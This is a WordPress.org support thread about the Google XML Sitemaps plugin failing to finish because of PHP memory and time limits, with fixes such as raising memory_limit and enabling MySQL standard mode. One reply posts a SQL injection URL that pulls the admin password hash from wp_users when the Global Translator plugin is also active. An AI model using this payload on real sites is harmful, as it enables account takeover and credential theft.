Title: [Plugin: Google XML Sitemaps] Memory/Time Limit Issue
Last modified: August 19, 2016

---

# [Plugin: Google XML Sitemaps] Memory/Time Limit Issue

 *  [kevsteele](https://wordpress.org/support/users/kevsteele/)
 * (@kevsteele)
 * [16 years, 8 months ago](https://wordpress.org/support/topic/plugin-google-xml-sitemaps-memorytime-limit-issue/)
 * Hello,
 * I keep getting the message “The last run didn’t finish! Maybe you can raise the
   memory or time limit for PHP scripts.”
    I talked to support at my web hosting
   company (Hostgator) and he said that to change the time or memory limit I would
   have to get a dedicated server. He tried changing the memory limit anyway to 
   the max which was 64M and I tried to rebuild it and got the same message. I tried
   writing it as a gzipped file (.gz) and got the same message. My website is tiny
   with only 2 posts so far and 2 other pages. I have no idea what the issue is 
   but I would really appreciate some help! I didn’t know building a sitemap with
   the generator would be this difficult.I can tell you the exact settings I used
   also if that helps.
 * Thank you very much,
    Kevin
 * [http://wordpress.org/extend/plugins/google-sitemap-generator/](http://wordpress.org/extend/plugins/google-sitemap-generator/)

Viewing 6 replies - 1 through 6 (of 6 total)

 *  [Mark Ratledge](https://wordpress.org/support/users/songdogtech/)
 * (@songdogtech)
 * [16 years, 8 months ago](https://wordpress.org/support/topic/plugin-google-xml-sitemaps-memorytime-limit-issue/#post-1247804)
 * You can try and increase PHP memory yourself using one of the methods below. 
   In your root .htaccess file, add this line:
 * `php_value memory_limit 64M`
 * Or, in your wp-config.php file, try this:
 * `define('WP_MEMORY_LIMIT', '64M');`
 *  [pino262](https://wordpress.org/support/users/pino262/)
 * (@pino262)
 * [16 years, 5 months ago](https://wordpress.org/support/topic/plugin-google-xml-sitemaps-memorytime-limit-issue/#post-1248032)
 * My problem was a wrong sitemap integration from Global Translater Plugin and 
   XML-Sitemap Plugin:
 * If this aint your problem try increasing your memory or learn .htacces
    If it
   is look, down here now.
 * GO TO `YOURSITE.COM/wp-admin/options-general.php?page=global-translator/options-
   translator.php`
 * Now scroll a bit down and uncheck this: Enable sitemap integration
 * Also some1 at my school found this sql injection attack wich is availbe when 
   both plugins are activated. here it is
 *     ```
       /wp/index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),
       666,CHAR(58))+FROM+wp_users+where+id=1/*
       ```
   
 *  [Arne](https://wordpress.org/support/users/arnee/)
 * (@arnee)
 * [16 years, 5 months ago](https://wordpress.org/support/topic/plugin-google-xml-sitemaps-memorytime-limit-issue/#post-1248033)
 * The sitemap plugin has nothing to do with the SQL injection since it is not active
   on the frontend.
 *  [Bootje](https://wordpress.org/support/users/bootje/)
 * (@bootje)
 * [16 years, 5 months ago](https://wordpress.org/support/topic/plugin-google-xml-sitemaps-memorytime-limit-issue/#post-1248034)
 * I’ve the same:
 * # The last run didn’t finish! Maybe you can raise the memory or time limit for
   PHP scripts. Learn more
    # The last known memory usage of the script was 12.5MB,
   the limit of your server is 32M. # The last known execution time of the script
   was 0.07 seconds, the limit of your server is 30 seconds. # The script stopped
   around post number 103 (+/- 100)
 * (don’t have Global Translator Plugin)
 *  [Bootje](https://wordpress.org/support/users/bootje/)
 * (@bootje)
 * [16 years, 5 months ago](https://wordpress.org/support/topic/plugin-google-xml-sitemaps-memorytime-limit-issue/#post-1248035)
 * Problem is solved: I just had to enable: “Enable MySQL standard mode. Use this
   only if you’re getting MySQL errors. (Needs much more memory!)”
 *  [nowhere0225](https://wordpress.org/support/users/nowhere0225/)
 * (@nowhere0225)
 * [16 years ago](https://wordpress.org/support/topic/plugin-google-xml-sitemaps-memorytime-limit-issue/#post-1248049)
 * [@bootje](https://wordpress.org/support/users/bootje/)
 * AWESOME !! now,i can fix it.THX YOU

Viewing 6 replies - 1 through 6 (of 6 total)

The topic ‘[Plugin: Google XML Sitemaps] Memory/Time Limit Issue’ is closed to new
replies.

 * 6 replies
 * 6 participants
 * Last reply from: [nowhere0225](https://wordpress.org/support/users/nowhere0225/)
 * Last activity: [16 years ago](https://wordpress.org/support/topic/plugin-google-xml-sitemaps-memorytime-limit-issue/#post-1248049)
 * Status: not resolved

## Topics

### Topics with no replies

### Non-support topics

### Resolved topics

### Unresolved topics

### All topics
